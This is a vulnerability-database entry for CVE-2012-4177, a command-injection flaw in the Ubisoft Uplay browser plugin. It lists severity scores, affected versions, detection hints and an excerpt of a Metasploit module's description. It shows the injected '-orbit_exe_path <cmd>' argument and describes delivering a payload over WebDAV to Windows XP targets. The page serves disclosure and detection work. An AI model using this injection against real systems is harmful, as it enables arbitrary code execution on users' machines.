CVE-2012-4177
published 2012-08-07CVE-2012-4177: The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument.
PriorityP274critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
58.02%
99.0th percentile
The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ubi | uplay_pc | <= 2.0.3 | — |
| ubi | uplay_pc | — | — |
| ubi | uplay_pc | — | — |
| ubi | uplay_pc | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command-orbit_product_id 1 -orbit_exe_path <cmd> -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play↗
- →Detect ActiveX instantiation of the Ubisoft uplay ActiveX component (classid) within a browser context, particularly when the `open()` method is called with `-orbit_exe_path` in its argument string. ↗
- →The exploit targets only Windows XP SP3 (NT 5.1) user agents; filter for exploitation attempts scoped to this UA string. ↗
- →The exploit serves the malicious payload via WebDAV over port 80; monitor for WebDAV PROPFIND/OPTIONS requests on port 80 originating from browser processes, especially followed by UNC path access (\\<host>\<share>\<random8>.exe). ↗
- →Look for processes spawned by the uplay browser plugin with command-line arguments containing `-orbit_exe_path` pointing to a UNC path. ↗
- ·The Metasploit module enforces SRVPORT=80 and URIPATH=/ and will fail otherwise; detections scoped to port 80 WebDAV are appropriate for this exploit as delivered. ↗
- ·Exploitation requires the victim user to be signed into uplay (or have auto-sign-in enabled) and uplay must not already be running at the time of the attack. ↗
- ·The exploit only engages Windows XP SP3 targets (NT 5.1 UA check); other OS versions will receive a 404 and not be exploited by this module. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ubisoft uplay 2.0.3 - ActiveX Control Arbitrary Code Execution (Metasploit)
exploitdb·2012-08-08
CVE-2012-4177 Ubisoft uplay 2.0.3 - ActiveX Control Arbitrary Code Execution (Metasploit)
Ubisoft uplay 2.0.3 - ActiveX Control Arbitrary Code Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution',
'Description' => %q{
The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be
running. Due to the way the malicious executable is served (WebDAV), the module
must be run on port 80, so please make sure you have enough privilege to do that.
Ubisoft released patch 2.04 as o
Metasploit
Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
metasploit
Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
The uplay ActiveX component allows an attacker to execute any command line action. User must sign in, unless auto-sign in is enabled and uplay must not already be running. Due to the way the malicious executable is served (WebDAV), the module must be run on port 80, so please make sure you have enough privilege to do that. Ubisoft released patch 2.04 as of Mon 20th July.
No writeups or analysis indexed.
http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fixhttp://osvdb.org/84402http://seclists.org/fulldisclosure/2012/Jul/375http://www.bbc.com/news/technology-19053453http://www.exploit-db.com/exploits/20321http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fixhttp://osvdb.org/84402http://seclists.org/fulldisclosure/2012/Jul/375http://www.bbc.com/news/technology-19053453http://www.exploit-db.com/exploits/20321
2012-08-07
Published